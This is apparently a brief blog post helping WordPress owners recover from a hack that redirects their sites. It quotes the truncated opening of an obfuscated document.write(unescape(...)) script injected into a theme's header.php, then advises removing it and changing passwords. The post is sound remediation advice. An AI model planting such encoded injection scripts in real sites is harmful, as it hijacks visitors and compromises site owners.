I’ve been seeing some WordPress blogs that are somehow getting hacked. I’m not sure how it’s happening, but if your blog seems to suddenly redirect to another page that you didn’t intend, this might help.
When I looked at the source code of the infected blog, I found this just after the <body> tag:
<script language=javascript>document.write(unescape('%3C%73%63%72%
I found the offending code in wp-content/themes/theme-name/header.php where theme-name is the specific theme name.
I took out the script and all appears to be working well again.
It would be smart to change your passwords too.
Hope that helps!
